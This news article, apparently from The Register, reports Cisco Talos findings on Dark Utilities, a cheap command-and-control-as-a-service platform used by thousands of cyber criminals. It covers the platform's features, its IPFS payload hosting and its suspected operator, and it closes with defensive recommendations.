This article is more than 1 year old

Dark Utilities C2 service draws thousands of cyber criminals

Nascent platform provides miscreants an easier and cheaper way to launch remote access, DDoS, and other attacks

A platform that makes it easier for cyber criminals to establish command-and-control (C2) servers has already attracted 3,000 users since launching earlier this year, and will likely expand its client list in the coming months.

Called Dark Utilities, the service provides a full range of C2 capabilities to give attackers an easier and inexpensive platform for launching remote access, command execution, cryptocurrency mining, and distributed denial-of-services (DDoS) attacks. The operators of the service also provide technical support and help for platform users via communities created on the Discord and Telegram messaging apps.

Dark Utilities is the latest example of malware-as-a-service (MaaS) and ransomware-as-a-service (RaaS) that diversify cyber criminals' revenue by letting them profit from less-skilled programmers on top of their own exploits.

It also echoes other trends including the rise of initial access brokers, who compromise systems and then sell that access to others who use it to launch attacks.

C2 servers act as the hub for cyber criminals during attacks, enabling them to manage their malware by sending commands and payloads and receiving data that is exfiltrated from infected systems. Through Dark Utilities, adversaries get a platform that supports payloads for Windows, Linux, and Python-based attacks without having to create channels to a C2 server.

"It's a key component to expedite the development of and lower the bar to RaaS and MaaS infrastructure," Andrew Hay, COO for LARES Consulting, told The Register. "With such an easy-to-use platform, developers need only worry about building or modifying the malware components of their attack."

It's also inexpensive and appears to be a volume play. According to researchers from Cisco's Talos threat intelligence organization, users can get access to the platform – which is hosted on the clear internet and Tor network – along with the associated payloads and API endpoints for €9.99 ($10.17). In a blog post, the Talos researchers wrote that in the months since the C2 platform was established, it has generated about €30,000 – more than $30,500.

"Given the relatively low cost compared to the amount of functionality the platform offers, it is likely to be attractive to adversaries attempting to compromise systems without requiring them to create their own C2 implementation within their malware payloads," the Talos researchers wrote. "We expect this platform will continue to rapidly expand its user base. This will likely result in an increase in the volume of malware samples in the wild attempting to establish C2 using the platform."

Hay said that "if a service can be modified to provide capabilities to a larger audience and at a price point that is consumable, the evolution of the service offering will continue."

Talos researchers wrote that almost immediately after Dark Utilities was established, they saw malware samples in the wild using the service to establish C2 communications channels and remote access capabilities on infected Windows and Linux systems.

The C2-as-a-service (C2aaS) platform more recently added support for other architectures, including ARM64 and ARMV71, which can be leveraged to target embedded devices like routers, phones and Internet-of-Things (IoT) devices.

The platform uses InterPlanetary File System (IPFS) peer-to-peer networking for hosting the payloads to make them more persistent, easier to hide, and more difficult to take down. Cybersecurity vendor Trustwave last month wrote about how threat groups are increasingly taking advantage of the decentralized nature of IPFS for their phishing attacks, for these reasons.

IPFS is "explicitly designed to prevent centralized authorities from taking action on content hosted there," the Talos researchers wrote. "We have observed adversaries increasingly making use of this infrastructure for payload hosting and retrieval as it effectively provides 'bulletproof hosting'."

Dark Utilities uses Discord for authentication. Once authenticated, users see a dashboard for generating payloads aimed at an OS that are then deployed against targeted hosts. After creating a C2 channel, the attacker gets full access to the systems to run the payloads.

Once the OS is chosen, a command string is created that the attackers will embed into PowerShell or Bash, according to Talos. To gain persistence, the payload creates a Registry key for Windows systems or a Crontab entry or a Systemd service on Linux machines.

The researchers wrote that Dark Utilities was likely created and is being managed by a persona that uses the moniker Inplex-sys. The persona doesn't have much of a history in the cybercrime world – though just after Dark Utilities was launched, it was advertised within the high-profile Lapsus$ Group's Telegram channel. They believe Inplex-sys is located in France.

Given how quickly Dark Utilities has been able to collect users in a short amount of time – and how likely it is to attract many more the coming months – "organizations should be aware of these C2aaS platform and ensure they have security controls in place to help protect their environments," the researchers wrote.

That includes tools for protecting endpoints and detecting malicious emails sent by attackers. Enterprises also need next-generation firewall appliances for detecting malicious activity associated with the threat from Dark Utilities users and a malware analytics tool for identifying malicious binaries.

They also should use multifactor authentication, tools for blocking access to possibly malicious sites and for testing suspicious sites before users can access them.

LARES's Hay also advocates education.

"If an organization doesn't continuously expand its knowledge around evolving threats and tools, it may find itself caught off-guard if the attack is aimed its way," he said. "Knowing how tools work and detecting their presence [and] activity should be an objective of any operational security monitoring and incident response program." ®

More about

TIP US OFF

Send us news


Other stories you might like